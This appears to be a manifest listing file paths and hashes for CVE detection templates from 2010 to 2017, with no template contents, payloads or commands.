-http/cves/2010/CVE-2010-2037.yaml:1a7f83fa1e946622e3bf8ec17acc75c53050b4ae -http/cves/2010/CVE-2010-2045.yaml:5be8e622ef32aebf73d60fcda8380f30e195c0ed -http/cves/2010/CVE-2010-2050.yaml:9da00e874195a830e55ae36aa1261166b73d71da -http/cves/2010/CVE-2010-2122.yaml:197efa9d9d8c1405dfd5c17b03621b1b14d1331b -http/cves/2010/CVE-2010-2128.yaml:b44e6fa07ac3499bfb1c1e0375860fb5841839a3 -http/cves/2010/CVE-2010-2259.yaml:b490d1239e3503f97829ceb9e4e0d7f85ca5dd14 -http/cves/2010/CVE-2010-2307.yaml:838d14a755408f8a5874b99cd433f2351cac8f97 -http/cves/2010/CVE-2010-2507.yaml:f2efa9ff948eff536d5e4f38d20981effcf99c75 -http/cves/2010/CVE-2010-2680.yaml:33254abfbded939b31380b0e03979610b2a1b5f8 -http/cves/2010/CVE-2010-2682.yaml:fefc559be445814e72a0a2fbf688c4bba8b2dc10 -http/cves/2010/CVE-2010-2857.yaml:3f7e3dae32fc9e1cea7e06db2ade17c64c07d61a -http/cves/2010/CVE-2010-2861.yaml:4444dd5b4451ce8858b3cc9096c2b96c0d1c99b3 -http/cves/2010/CVE-2010-2918.yaml:4c29b1b146cd15863b92d5f31ceb7d9b6c0eb0a8 -http/cves/2010/CVE-2010-2920.yaml:e18f1b209a370f72c0004abcda664be95ba4c0a4 -http/cves/2010/CVE-2010-3203.yaml:f99bc34d492999d3cfef1f06bdbf7f488c9abc38 -http/cves/2010/CVE-2010-3426.yaml:e388368ef9ea81d2a61f84584f0553bf9ee11b7d -http/cves/2010/CVE-2010-4231.yaml:db4e971d2be38f98e081dbe31fc832ba1cfce39c -http/cves/2010/CVE-2010-4239.yaml:ef007722afc5cbb271d7ca47a1549ca7f7cf8fe9 -http/cves/2010/CVE-2010-4282.yaml:db73f053b2399c408f8717a89c287166827b8521 -http/cves/2010/CVE-2010-4617.yaml:7eeb28bbd6588f7389bbaae49d1ad856ac6a376b -http/cves/2010/CVE-2010-4719.yaml:6cc07656b912edacf8203183172e36d40e5ea995 -http/cves/2010/CVE-2010-4769.yaml:b437ed40b16456429bdfadbbd6e9a87ca9c74c76 -http/cves/2010/CVE-2010-4977.yaml:6af4d0061cf555962007125b9db0fde0d21f5c37 -http/cves/2010/CVE-2010-5028.yaml:1c50c807b01b5ef6ea499066249aca3df89eada8 -http/cves/2010/CVE-2010-5278.yaml:d08bafe1003b852b203b0518a97954089d81d70a -http/cves/2010/CVE-2010-5286.yaml:5db310295962d8db88454367caed14c29455d7eb -http/cves/2011/CVE-2011-0049.yaml:d02e901c8f2d60edb9f47eb79a7869f30480b705 -http/cves/2011/CVE-2011-1669.yaml:8ed025a5e765afc4436417fbc90d8b008fee7c45 -http/cves/2011/CVE-2011-2744.yaml:ed1f1d4404964e37f62d8254b9401bab41c35b8a -http/cves/2011/CVE-2011-2780.yaml:86135ed458520bf802784c9cb926c4fd94735a1a -http/cves/2011/CVE-2011-3315.yaml:0ad4b69ba4cf3995cd9f8ef79c8c403f225dfc9c -http/cves/2011/CVE-2011-4336.yaml:cc465bab1b8887019ce51c94a38dcc59fe2563ad -http/cves/2011/CVE-2011-4618.yaml:05b2b2a56ba81f18efd1f480fe932f6023311612 -http/cves/2011/CVE-2011-4624.yaml:5abc56d51c278d9e26d21e5ca7ad5385b704f4ce -http/cves/2011/CVE-2011-4804.yaml:6e3322eba987e80072ee73c2bd7598696b1b98dd -http/cves/2011/CVE-2011-4926.yaml:915f75cad4a92dd854753798548b0b76d2501b51 -http/cves/2011/CVE-2011-5106.yaml:9d3e72a8c863eb8355659d01853edf5f5b581456 -http/cves/2011/CVE-2011-5107.yaml:3cfd8f6b8576834fa38ce5c65f75a92dca5d4d4c -http/cves/2011/CVE-2011-5179.yaml:4cf54bede22fbcd1d8ac79fa3abdeb225534b1bc -http/cves/2011/CVE-2011-5181.yaml:91f3fcb9362afecb0caca107cbf1ac2e6e6736fc -http/cves/2011/CVE-2011-5252.yaml:778c9c8a1f3b2802ddec5d834df59efd8a2df601 -http/cves/2011/CVE-2011-5265.yaml:a38be5371cc6634b1dcd82757149ce425e91d308 -http/cves/2012/CVE-2012-0392.yaml:40ff7c2eafc9d6490e89abda67b693e651fab6d4 -http/cves/2012/CVE-2012-0394.yaml:00e1bb95c00439704582c3867bf60d5a763a407f -http/cves/2012/CVE-2012-0896.yaml:54bf1bf5bdf74e17da383a7f6fb8d3cb65f093c5 -http/cves/2012/CVE-2012-0901.yaml:c581379703d144a3227c6f722835ab8e48fe172b -http/cves/2012/CVE-2012-0981.yaml:a522374127c43ab1de8cf6d8564e717033ef7c89 -http/cves/2012/CVE-2012-0991.yaml:1002cbbd6fdf8eacaf82ee219bbf45f9cf7dda1e -http/cves/2012/CVE-2012-0996.yaml:48baaee952f8aa6be0cfe419f5d89e15a98c916f -http/cves/2012/CVE-2012-1226.yaml:d77cd3977c9766e6fa11e0851ec521029d8d4c0c -http/cves/2012/CVE-2012-1823.yaml:8a9cfee0eaca4eae36f3c57810f99f48fc1e5493 -http/cves/2012/CVE-2012-1835.yaml:e43241cb5940ca1a2b695ed4808a778ea9c58440 -http/cves/2012/CVE-2012-2371.yaml:c14cb4be1e4795dddde17db6fa671bb1ab5132bd -http/cves/2012/CVE-2012-3153.yaml:9416c72d3dddb990c80df9d2477f13d6ed390eb8 -http/cves/2012/CVE-2012-4032.yaml:66101d5e8879ec06ec1605acba9e0c409b9ef1a8 -http/cves/2012/CVE-2012-4242.yaml:57865742e4412aa5fb3ce06d8c768415e2ab2acd -http/cves/2012/CVE-2012-4253.yaml:65291c67421086a3438fc55df8909ceb8e19b662 -http/cves/2012/CVE-2012-4273.yaml:30fddd3d0fe3c7cd555800972f133f64e8d6ef48 -http/cves/2012/CVE-2012-4547.yaml:da453f6f0b56aba41a1024ceb2cd0828469e93b6 -http/cves/2012/CVE-2012-4768.yaml:bf8b2d19e12bf41a62d6082b2a49cca26e2211b3 -http/cves/2012/CVE-2012-4878.yaml:76e1e8786658eb85b90e63d802e4f33d53c12850 -http/cves/2012/CVE-2012-4889.yaml:ced5e9593787611449850886dbdf7d8a2acf0ac9 -http/cves/2012/CVE-2012-4940.yaml:2a0afcc9871919c18e36e06973dcaf9951ced9be -http/cves/2012/CVE-2012-4982.yaml:976f37c7f2b4b91efee896e2bd6ec90d1ddabc3a -http/cves/2012/CVE-2012-5321.yaml:7aa9e959bb1522c26edcab1a6a3365636748ffa1 -http/cves/2012/CVE-2012-5913.yaml:af44ce6eba30ba3d254eac3ab315b882b5af801b -http/cves/2012/CVE-2012-6499.yaml:d99ac8c67d92e9f6d81fa86a606fcf933493f23c -http/cves/2013/CVE-2013-1965.yaml:c3cf9a3ae694b9af16955665cbef1299a2392b79 -http/cves/2013/CVE-2013-2248.yaml:60109fc1a86db2f1035a262aa7636a8cb6b4a929 -http/cves/2013/CVE-2013-2251.yaml:08568f8d2586b4b1e99930ffee5f3a7a409e3c0e -http/cves/2013/CVE-2013-2287.yaml:614b60e6a3b6080fae2c1525edb468484c5976e9 -http/cves/2013/CVE-2013-2621.yaml:97021411eb926b693860d548780566021f454e41 -http/cves/2013/CVE-2013-3526.yaml:81354b6f41e2d2ac6e0d982d6a6416fa3c9bcbaa -http/cves/2013/CVE-2013-3827.yaml:037ae365c7b33c1409fa2cfe57da0a8833bfe46a -http/cves/2013/CVE-2013-4117.yaml:87d37ef70904a07f92299d76164128c30cf4a035 -http/cves/2013/CVE-2013-4625.yaml:16b2d9be044ee1ba9e0695492b0ce3d6a7ae36f9 -http/cves/2013/CVE-2013-5528.yaml:5c478afe624ebc42382762b54e2712309c63bb87 -http/cves/2013/CVE-2013-5979.yaml:6bc931bf478f9809a677aa43be24f3a88e328c7e -http/cves/2013/CVE-2013-6281.yaml:ac2a396458dae279ee5699cb663f57ba753c66e9 -http/cves/2013/CVE-2013-7091.yaml:2adf85dbd9056272abedb535705f0212cf7d4264 -http/cves/2013/CVE-2013-7240.yaml:db80fbc4b5cf997ee701ef78865dfb5cbb382d81 -http/cves/2013/CVE-2013-7285.yaml:c7068d71749691932ca8516da9f8dc1c62ad343f -http/cves/2014/CVE-2014-10037.yaml:cd973f4837b2517e4df841470a7d40156e5f6710 -http/cves/2014/CVE-2014-1203.yaml:b49ae185ad4a15b92cecea925be7ccd80ad4c630 -http/cves/2014/CVE-2014-2321.yaml:f8dec04b7bcb172d9ef5ee17058aaea87a0706ec -http/cves/2014/CVE-2014-2323.yaml:f023d2527ffd20aafa31e5e59f57e1038986ad5f -http/cves/2014/CVE-2014-2383.yaml:d93c2650e04677cec08d4cfb24958f85c3679258 -http/cves/2014/CVE-2014-2908.yaml:a06812dc32233b99d7338f8d34cb7749dc42996b -http/cves/2014/CVE-2014-2962.yaml:3586a1e9fa3c5937974c2e5aec6b53b74d61dcd4 -http/cves/2014/CVE-2014-3120.yaml:b96d5eb863743321743fd4e2da75f122b98aa242 -http/cves/2014/CVE-2014-3206.yaml:c08c6c72ac14f7684a45d4c56cb8ab487fedcf83 -http/cves/2014/CVE-2014-3704.yaml:f59c218b1c2df283d055b4d2047343a9952da12f -http/cves/2014/CVE-2014-3744.yaml:856b7464857a93136dca3549d1e46cedb798a6ec -http/cves/2014/CVE-2014-4210.yaml:83e767c6b0694b23e61cace2f8faed980cddb5b6 -http/cves/2014/CVE-2014-4513.yaml:f428a7f16fa553a499a0017f12c378348fc9d259 -http/cves/2014/CVE-2014-4535.yaml:5d64f1681ccfd163fb6fe3c6d3383887d256c315 -http/cves/2014/CVE-2014-4536.yaml:c70a3aee16b462bd6ad0d032b3d937df144d19f7 -http/cves/2014/CVE-2014-4539.yaml:4c0db612892790ef259d159d4e728a4ff2f4e4c6 -http/cves/2014/CVE-2014-4544.yaml:77b0f6f83cf101f9ab8ace43d5c8180dba8c4e0c -http/cves/2014/CVE-2014-4550.yaml:a2987929f298a711f76750babc16185af78c3f8e -http/cves/2014/CVE-2014-4558.yaml:a655a13002d8fee9097f0adb64e440845ab22c01 -http/cves/2014/CVE-2014-4561.yaml:254973d328748cf6a65bead95dbc7bc4387140d1 -http/cves/2014/CVE-2014-4592.yaml:dee72ac2190800a233e7aa515d62ac602568d18e -http/cves/2014/CVE-2014-4940.yaml:d0be1746fb12427bf8e376d1fb457ea3dc41eb50 -http/cves/2014/CVE-2014-4942.yaml:0a5942b9a6e329a33aa8396d8e064772df2adb36 -http/cves/2014/CVE-2014-5111.yaml:e717047373ab95d87c6622476d057593af80d230 -http/cves/2014/CVE-2014-5258.yaml:a74b909ab5ad9f2902827317382c7ce133117678 -http/cves/2014/CVE-2014-5368.yaml:68f817e7a2514c1218223eaa4f02f77bcb8f6bb1 -http/cves/2014/CVE-2014-6271.yaml:ac80820cf3da3dfb0620ebaee06b18087978a89a -http/cves/2014/CVE-2014-6287.yaml:e7b94bb6c012b8a7b5d4fad70250cafa6086aab6 -http/cves/2014/CVE-2014-6308.yaml:32349eb9a384c2f031536efa916a57c77f726d28 -http/cves/2014/CVE-2014-8676.yaml:41e46a15cea0bc0fbcda2f18026335e8c53aab49 -http/cves/2014/CVE-2014-8682.yaml:745f5b63e9c1a3470f7cb97e8e9b45a9e0518db0 -http/cves/2014/CVE-2014-8799.yaml:f16bad76936bece209b064156bc8b65fa7c0d66a -http/cves/2014/CVE-2014-9094.yaml:1ed28a4587a3964f7d422308f8c99e236d278328 -http/cves/2014/CVE-2014-9119.yaml:9060a8d07fc17802318794d49c4fd824be3972df -http/cves/2014/CVE-2014-9444.yaml:ba2b35bb4a3b46f3146b159476b05bff3aab43c5 -http/cves/2014/CVE-2014-9606.yaml:5b24ed122c0ca840d115f2d5f91ea47c66b35e5d -http/cves/2014/CVE-2014-9607.yaml:6d9770a3d08c905fd8ae42b2b6b99e164d34e5df -http/cves/2014/CVE-2014-9608.yaml:0a9cb54e8f37d23cd4a706c79819aab8c31d3f9e -http/cves/2014/CVE-2014-9609.yaml:82e854be18284fbcbfd7cf17fa0d4c285c94ddec -http/cves/2014/CVE-2014-9614.yaml:09cb49114f16e6af3cfe682503149cf56fec52ec -http/cves/2014/CVE-2014-9615.yaml:c17679c73c789359ebf6bed2f235cc1f1adaee38 -http/cves/2014/CVE-2014-9617.yaml:ab33c3652f04d9b2bf8dee70f99451b2e3162857 -http/cves/2014/CVE-2014-9618.yaml:8f2390c6a851766f7d09051e73b1340881aeffe0 -http/cves/2015/CVE-2015-0554.yaml:95e4d128577398800b719c18917d0965542cb3ec -http/cves/2015/CVE-2015-1000005.yaml:1267e5c90f330e522e8e5d43ba9ae8b826b62529 -http/cves/2015/CVE-2015-1000010.yaml:3c34b1bda34ecb3833ec33a0a4d19cc9db072855 -http/cves/2015/CVE-2015-1000012.yaml:4f55345f99ce9cb3216bb1d92283051c9f2bc52a -http/cves/2015/CVE-2015-1427.yaml:d1d046bf619adb0edd2805ccbc36adcb9b7e2544 -http/cves/2015/CVE-2015-1503.yaml:e745532608ee6cfa053ca1673aad590121d7b0fd -http/cves/2015/CVE-2015-1579.yaml:8b70fbfcc71f5f518f6dd6a9ffbf34eb2ce4504c -http/cves/2015/CVE-2015-1880.yaml:e67daa2c940de23e8776c7717302c5cbdffb2dfe -http/cves/2015/CVE-2015-2067.yaml:b1ae44ec9e41c9cdbf339c0723e46d0a04f49b4c -http/cves/2015/CVE-2015-2068.yaml:f1cf652452a65bdb9e5b800dd3df0b7ddce9b12a -http/cves/2015/CVE-2015-2080.yaml:c82b6706571540d7b4fbf9dd40d7e2b18a6f21ed -http/cves/2015/CVE-2015-2166.yaml:1f1d19bb804d6ee7feb0f13ad9f1aa52bfdda51e -http/cves/2015/CVE-2015-2196.yaml:e9bfcaca238fa991b9077e45483c01e66a238e87 -http/cves/2015/CVE-2015-2755.yaml:bf31e7b8b1378ea22488e9479c079eb7d97c82dd -http/cves/2015/CVE-2015-2807.yaml:94f57fc32f76db5a7ab536149475b125517b7414 -http/cves/2015/CVE-2015-2863.yaml:c16c4110b5623ad016e5e26dc571e3a517839984 -http/cves/2015/CVE-2015-2996.yaml:0b734d93bff3fc3a9f9013ecc20c41f9e8bef841 -http/cves/2015/CVE-2015-3035.yaml:e7489a90679f0aa3cf2e9e439c62a9eb1d0dea1a -http/cves/2015/CVE-2015-3224.yaml:ae834273be7cb8923a0fbac14d95a425fb15e12e -http/cves/2015/CVE-2015-3337.yaml:59138b4f50a720df3a47d058a97f79aab7de2be2 -http/cves/2015/CVE-2015-3648.yaml:8178a1f5e5128914b37e26f8f902aeb13a0d3eb1 -http/cves/2015/CVE-2015-3897.yaml:c806c78669a2e218a8df2a3df721fa8a85fded37 -http/cves/2015/CVE-2015-4050.yaml:039acab50e310d4c7a5ef0ff0a069721fbbb036f -http/cves/2015/CVE-2015-4062.yaml:73910b122dd5ce8de22cc13eca84bcedd3e88edd -http/cves/2015/CVE-2015-4063.yaml:f844ebc4d92fc2cb464482b640c2a76f85dfb302 -http/cves/2015/CVE-2015-4074.yaml:29b62c344d94dc1908d26f0d7aeb4647f0041539 -http/cves/2015/CVE-2015-4127.yaml:5bf239d70fe24d8c03ddb688788757f0e9a205aa -http/cves/2015/CVE-2015-4414.yaml:e5e5b695fb4ff2196186c799c1fca6189d6a129e -http/cves/2015/CVE-2015-4632.yaml:69719c20d9c7f2eaeb5c16fca693b57cf8d5a982 -http/cves/2015/CVE-2015-4666.yaml:cad1f4c6f2d574b68c6ce8ba4c0690b6937b9c35 -http/cves/2015/CVE-2015-4668.yaml:a7ef52eacc8f0278b3bbaac64fb2d9e1a45b64c2 -http/cves/2015/CVE-2015-4694.yaml:5e8d6bdd3d01c2941b5ff5c9b886d0182642f767 -http/cves/2015/CVE-2015-5354.yaml:b6bef97e181e06c03e0d6f8f0371633a68555f84 -http/cves/2015/CVE-2015-5461.yaml:b3675f6849aef7d5d5e16664db8e0372c58002fd -http/cves/2015/CVE-2015-5469.yaml:e21413b786e2c00f0a1fb715fc49d23a06f1cf3f -http/cves/2015/CVE-2015-5471.yaml:5963c73a995bc99b79167952eb0c8744f1351039 -http/cves/2015/CVE-2015-5531.yaml:cd962836b08272d0a93826b39632f85e1ce89958 -http/cves/2015/CVE-2015-5688.yaml:9aafc192be103311a276772805056a23b37a4289 -http/cves/2015/CVE-2015-6477.yaml:16ab3ec12438438f21b6fc7fb3243e8694e35e0d -http/cves/2015/CVE-2015-6544.yaml:531c5bef892fc62f8c64ec6da9b7cd7ab7a07d96 -http/cves/2015/CVE-2015-6920.yaml:344cecf6a17f7b7d5ed83b598d295bd4afff7ef1 -http/cves/2015/CVE-2015-7245.yaml:885f5df43eeb4a591215a51a924a2bd1f3bfc2bc -http/cves/2015/CVE-2015-7297.yaml:9c31fc283f2a109533bd1855932ac865ca51021d -http/cves/2015/CVE-2015-7377.yaml:1f518dd7c1f10279f68d7976780f90823e0372e3 -http/cves/2015/CVE-2015-7450.yaml:7a363273a9ba70f7aae6b7914123a5741f908ba8 -http/cves/2015/CVE-2015-7780.yaml:b320d432340394ffa1dc099d96484c8e798da90d -http/cves/2015/CVE-2015-7823.yaml:08d872c5aba85ff5b2fb443dcbf592eb32455ff4 -http/cves/2015/CVE-2015-8349.yaml:a439ffb4dfd5ceafc232c03ff0ba1210e4cda706 -http/cves/2015/CVE-2015-8399.yaml:4f4b845efa89b32e67ebc0e1ef41ba6026c3463f -http/cves/2015/CVE-2015-8813.yaml:e53cfc0756cac70a51a28ae4b6ddad1c33241954 -http/cves/2015/CVE-2015-9312.yaml:15e388d87b0ebfec087990c52b32f4dab12d09f9 -http/cves/2015/CVE-2015-9323.yaml:6f883c4162673d4f5b43309c1821195f185c6f6f -http/cves/2015/CVE-2015-9414.yaml:1e6c5dec5159410280f65ce0b34c10df8e0d1115 -http/cves/2015/CVE-2015-9480.yaml:606bab4f61f7952dfaa956929f77f3fa4b7017c6 -http/cves/2016/CVE-2016-0957.yaml:2e8db61d74f32037567199f53bba38a7597de6b7 -http/cves/2016/CVE-2016-1000126.yaml:200e13e78dc40fb6853f95021b2b5d31c95f806c -http/cves/2016/CVE-2016-1000127.yaml:eeff65a38cf5e4551e38b55461fbac444bfd4e27 -http/cves/2016/CVE-2016-1000128.yaml:036c054b27c33be7db36a422ce311d6b26fedbe2 -http/cves/2016/CVE-2016-1000129.yaml:23ce658c75c9492f5f751e1a539e399f7bcddbcf -http/cves/2016/CVE-2016-1000130.yaml:f7cbba46ad8678e65594c8f8836fbac73b171f1c -http/cves/2016/CVE-2016-1000131.yaml:e9b5cc8b9f4c5a39df5579053c08039ccd1807c9 -http/cves/2016/CVE-2016-1000132.yaml:3f4a7f52d1199a9956d378e7376c00baa44e2fc8 -http/cves/2016/CVE-2016-1000133.yaml:646a0bc524a70a2c73afe9830cb5d8b861ed03d7 -http/cves/2016/CVE-2016-1000134.yaml:bcea14f1e23381d706aef28dcfbed7df01748e3d -http/cves/2016/CVE-2016-1000135.yaml:18f9f6c7da51d3ca592bb40ccc48831b8167be11 -http/cves/2016/CVE-2016-1000136.yaml:e3df2a9eb52a9c63d70e1894e737d6a8a8d56087 -http/cves/2016/CVE-2016-1000137.yaml:ca82c09ff9f78ed898ed96b058ddc708e722cfe8 -http/cves/2016/CVE-2016-1000138.yaml:2a595e1d9609b4c63eea12fb46658cfa1da8a5ab -http/cves/2016/CVE-2016-1000139.yaml:247c6d15c3e656a9dd2d6c6807853b9a80594b31 -http/cves/2016/CVE-2016-1000140.yaml:c279959a4247aa8a9b64ce2c176c966e83d29af4 -http/cves/2016/CVE-2016-1000141.yaml:3510a688d13f70807120371036a35b494daee81f -http/cves/2016/CVE-2016-1000142.yaml:6dacb544ed8c6c80b4c6cdc45a607aed9497fa37 -http/cves/2016/CVE-2016-1000143.yaml:6ad20f23bdefc2287a51bd65ecf3ccf4ae805cf1 -http/cves/2016/CVE-2016-1000146.yaml:7bc017050d5f7c334f3c949a4d3d60aeb07b0dd9 -http/cves/2016/CVE-2016-1000148.yaml:5bdeaeb43b39098bf09b04166b177641211ba5ad -http/cves/2016/CVE-2016-1000149.yaml:b3d710cfadfef57b5cc80d4f122ebc4d373b33b6 -http/cves/2016/CVE-2016-1000152.yaml:e25c8b79e2c6c6c7fd5b6630b9d114c2ea254fed -http/cves/2016/CVE-2016-1000153.yaml:7d2e8973054a82f9afd5ca66ca50f75460b2dea0 -http/cves/2016/CVE-2016-1000154.yaml:61bd811fbdb2fedb8c28b39aaa6c859a74f37243 -http/cves/2016/CVE-2016-1000155.yaml:f1698e2a12266c19bc49ed8d597990c7386f389f -http/cves/2016/CVE-2016-10033.yaml:f00e2dd47d5b9ecec18936a07ad16d59ea40074c -http/cves/2016/CVE-2016-10108.yaml:bddb21b1471d52c06c320dcdb6c053b57dd55570 -http/cves/2016/CVE-2016-10134.yaml:d3c0f3f5ac5527773515d1d38d87f8af4a881b0a -http/cves/2016/CVE-2016-10367.yaml:6641c570cce6ef480422fac30815a63bcb99b469 -http/cves/2016/CVE-2016-10368.yaml:ec846293049ba00d6caef96095bbe8f83739800b -http/cves/2016/CVE-2016-10924.yaml:6e7f57dcddc9d1c37be6d64c9da64c1cfc52cc99 -http/cves/2016/CVE-2016-10940.yaml:904458c57358e3b4b8628a6983f12b031ffa4c7d -http/cves/2016/CVE-2016-10956.yaml:2f2619f124b225fe2a268f1f0f69db2fa2535ee7 -http/cves/2016/CVE-2016-10960.yaml:36cd6711c988643a1ece706f53a9e5d4a0153d88 -http/cves/2016/CVE-2016-10973.yaml:72cdcfd2ad3bb75f2766a504dc30d46226c1645a -http/cves/2016/CVE-2016-10993.yaml:1c0bd3c8bfbd749118c5489e554061dda48b5e05 -http/cves/2016/CVE-2016-1555.yaml:04a439eeb2d2b8e03d89cf7e7d5aac1d469792ac -http/cves/2016/CVE-2016-2389.yaml:82767e9925522da528a3646fa4def9d6f8ab401e -http/cves/2016/CVE-2016-3081.yaml:140f6efaca3b9883f7c0db8c90e4a0d0a2a7da67 -http/cves/2016/CVE-2016-3088.yaml:64da1d42181cf8e002485ce5c2ad83d218a003d0 -http/cves/2016/CVE-2016-3978.yaml:88f43e54282f984db830bd850a4ddf4fe62e5385 -http/cves/2016/CVE-2016-4437.yaml:5a6e676d43ca9afd7bc9384868e01a6309e775b4 -http/cves/2016/CVE-2016-4975.yaml:fbdfa1e9d73f993f455aa5e28ccfb8d51dfb089b -http/cves/2016/CVE-2016-4977.yaml:f51336e37907b113c0eafbd28373464a5f28a43c -http/cves/2016/CVE-2016-5649.yaml:b863228b5f7ffda189d15a6c0144889b6988fccc -http/cves/2016/CVE-2016-6195.yaml:15f013136bba650a4d40b7087ab3f4bb8f15d7dc -http/cves/2016/CVE-2016-6277.yaml:7da7859ed05d2a1ad86e763a3da069f284cd875f -http/cves/2016/CVE-2016-6601.yaml:2c868c2f08b15b691929d4f4e6e075b35566a401 -http/cves/2016/CVE-2016-7552.yaml:b2472284c780d930c3dd67faf22cbb44974b30e5 -http/cves/2016/CVE-2016-7834.yaml:eb1d819545217487341e83b81b104712e7a8ad54 -http/cves/2016/CVE-2016-7981.yaml:e5cb21bbfae6e9470583bfc1bf09d55e02cc08e1 -http/cves/2016/CVE-2016-8527.yaml:3004c01e32bf7d4bfaa333cbdc5feeeb186d1cc2 -http/cves/2017/CVE-2017-0929.yaml:4923be016e228c9bef5a6264c937dd7e4c57b205 -http/cves/2017/CVE-2017-1000028.yaml:adc06fe3c9b5c9d5ad2f8a19ed0d834c0e841663 -http/cves/2017/CVE-2017-1000029.yaml:c5d55b56ae257647aab8ed2985ae5d1bc636338a -http/cves/2017/CVE-2017-1000163.yaml:89fa1946bf84379183eee34c74ce3116df75494b -http/cves/2017/CVE-2017-1000170.yaml:33c528d0d88c4957d83c47e47de95dc17ed64f91 -http/cves/2017/CVE-2017-1000486.yaml:93821abf0b7b68c95850a40e445754e3a881c48f -http/cves/2017/CVE-2017-10075.yaml:2da0789d118791da3e461b09ef8906739b249e3f -http/cves/2017/CVE-2017-10271.yaml:b91c17740eddbfdf706eb93cf92f040c96c20374 -http/cves/2017/CVE-2017-10974.yaml:0da166f6f80c553012225cbe0a4073fb731c4941 -http/cves/2017/CVE-2017-11165.yaml:0adc23697ffaac93ad0763fc5ca2908fb56001cd -http/cves/2017/CVE-2017-11444.yaml:d63d2cf37c008883adac575ccaf0c3c726c79e1a -http/cves/2017/CVE-2017-11512.yaml:4efe7ae65e4ebc4f0a51705706e41965eb09d2a7 -http/cves/2017/CVE-2017-11586.yaml:42c8717104adebdd353ba62096cf559b092c0cce -http/cves/2017/CVE-2017-11610.yaml:a6b29ae149ebf5d941e57992b319552ac643846f -http/cves/2017/CVE-2017-11629.yaml:9cf76531e205e75dc2ef573eec352a86b5c51901 -http/cves/2017/CVE-2017-12138.yaml:9462bd277c5d204b18e0c953dcbc8dbb8e6f14a3 -http/cves/2017/CVE-2017-12149.yaml:5157d1505a8fe9591df01e967055e726fdc0021c -http/cves/2017/CVE-2017-12542.yaml:870209fb155397d7035b2f199d88a8550b05e537 -http/cves/2017/CVE-2017-12544.yaml:f4f5deeeca700ec4f79fee69d995b47db9bef113 -http/cves/2017/CVE-2017-12583.yaml:02e135d474d8dccb8d8e8007db3f545807798865 -http/cves/2017/CVE-2017-12611.yaml:25e712027ca2b7d084f862c4422dec5bd522eb4b -http/cves/2017/CVE-2017-12615.yaml:27ef582fb504e39a3efb27e363854fb74e5fa151 -http/cves/2017/CVE-2017-12617.yaml:9e23c456353a5d203c9c3e38905fce363186a5d9 -http/cves/2017/CVE-2017-12629.yaml:979e941236d8769df4b15a6da8ef323743c44a70 -http/cves/2017/CVE-2017-12635.yaml:4aff272f214c81d0ed536fd2d3dea463f6e09c5d -http/cves/2017/CVE-2017-12637.yaml:59d4f9394b3d4c432ce4924bc3fd4920d500aa65 -http/cves/2017/CVE-2017-12794.yaml:ca35c54ad0df577b07e69dd6dbd769a9029c7b69 -http/cves/2017/CVE-2017-14135.yaml:9ade6317269fcf946f65c1fe23d5a4821d49ef56 -http/cves/2017/CVE-2017-14186.yaml:82067aa6cc98c6bd15979734ff92203eaf80c300 -http/cves/2017/CVE-2017-14524.yaml:286a9398acef3483fde6ccf9f02314542a6fe685 -http/cves/2017/CVE-2017-14535.yaml:44cfe48fd0ba1b76c866fd77330002bb734f17c4 -http/cves/2017/CVE-2017-14537.yaml:85f2f7c1a0276b5955268d884a07b6103001e927 -http/cves/2017/CVE-2017-14622.yaml:009cc090824157a793ad788ffa8b667ebe4a4578 -http/cves/2017/CVE-2017-14651.yaml:81e53e54afa559d677de2dfb247da54797ab9f9a -http/cves/2017/CVE-2017-14849.yaml:89f1297fc1fb1bb2d1971aeb1a245c165837a135 -http/cves/2017/CVE-2017-15287.yaml:575e08ffef0f9ba3736bc3bb52ecad08f8867ddf -http/cves/2017/CVE-2017-15363.yaml:d603b17feb3f7fcb89b1beaa1671e341c83e4efc -http/cves/2017/CVE-2017-15647.yaml:3b6a65a96e80b64c1f0fad9143d874659bde8305 -http/cves/2017/CVE-2017-15715.yaml:7e37ca9e68af8c8bad4c7be50f055494cd804164 -http/cves/2017/CVE-2017-15944.yaml:2c1f855cbc53834abd8f252d9e3999d1473be76c -http/cves/2017/CVE-2017-16806.yaml:802251cf40fa62282cdecea2436d6dd6497124dc -http/cves/2017/CVE-2017-16877.yaml:0e875556b7f8c8c4da13e50b108187b7b6d97688 -http/cves/2017/CVE-2017-16894.yaml:0a1a6ac6325d01e843e72d4deeee0cdc8ddaf15e -http/cves/2017/CVE-2017-17043.yaml:ac7d7075a0fc4e2b3c70f1c4a843fa1f5358ebc3 -http/cves/2017/CVE-2017-17059.yaml:c96d4a8d2d8df6d2035c09364e0e48d6c69fc00a -http/cves/2017/CVE-2017-17451.yaml:5514ae906206577d89fe90d1bfb0550b0a048918 -http/cves/2017/CVE-2017-17562.yaml:d62eee9cc31b63aea8b9c6ac1eeaec4b2b779e06 -http/cves/2017/CVE-2017-17731.yaml:27c116c37c4a35154e00feb6b52c8c67ec906860 -http/cves/2017/CVE-2017-17736.yaml:101ec47f61f55d556850db21b63631ee330fef0f -http/cves/2017/CVE-2017-18024.yaml:753d067291d82fca91af88f6ffa82b73449d98e2 -http/cves/2017/CVE-2017-18536.yaml:1849058e7a1fbe3538ba981d0617a30f2bd04039 -http/cves/2017/CVE-2017-18598.yaml:92a7ade9a70c49981dbf6315832422f94d482ab9 -http/cves/2017/CVE-2017-18638.yaml:ff2bb81e1d4fdcb5474369b89382309ea95c0ae7 -http/cves/2017/CVE-2017-3506.yaml:bb70520fdfb18265cfe4a573cfdf2d44d8057e41 -http/cves/2017/CVE-2017-3528.yaml:39d3b4ebf9b78d8bf5dbc06b52eccef8bb591375 -http/cves/2017/CVE-2017-4011.yaml:9966b265f6ac1fdad2fee7d7edec593ad8d82abd -http/cves/2017/CVE-2017-5487.yaml:c5f0dbaad97012a47bbfa9d168af81be1f2954a8 -http/cves/2017/CVE-2017-5521.yaml:e7811cb095916427d485b1f5424abc07f929269f -http/cves/2017/CVE-2017-5631.yaml:eb6e889348a5ed9c656bec31eeee752fbb92b38a -http/cves/2017/CVE-2017-5638.yaml:63584fb0c5610ac96fccd6f9cf77ecdc7f3c9ac4 -http/cves/2017/CVE-2017-5689.yaml:6831ebd7885988d2d7ab01c352aadb5221773ed4 -http/cves/2017/CVE-2017-5982.yaml:c855ed9212a94e4787a5668611b8b021b5cffa74 -http/cves/2017/CVE-2017-6090.yaml:b28ac97d26e866b046cfc0e5f8fdf5b30b65d18e -http/cves/2017/CVE-2017-7269.yaml:a126d79265c486b672b3184c3cd3288488fcb853 -http/cves/2017/CVE-2017-7391.yaml:2f36578f07ade78cade7055e250580e377b44993 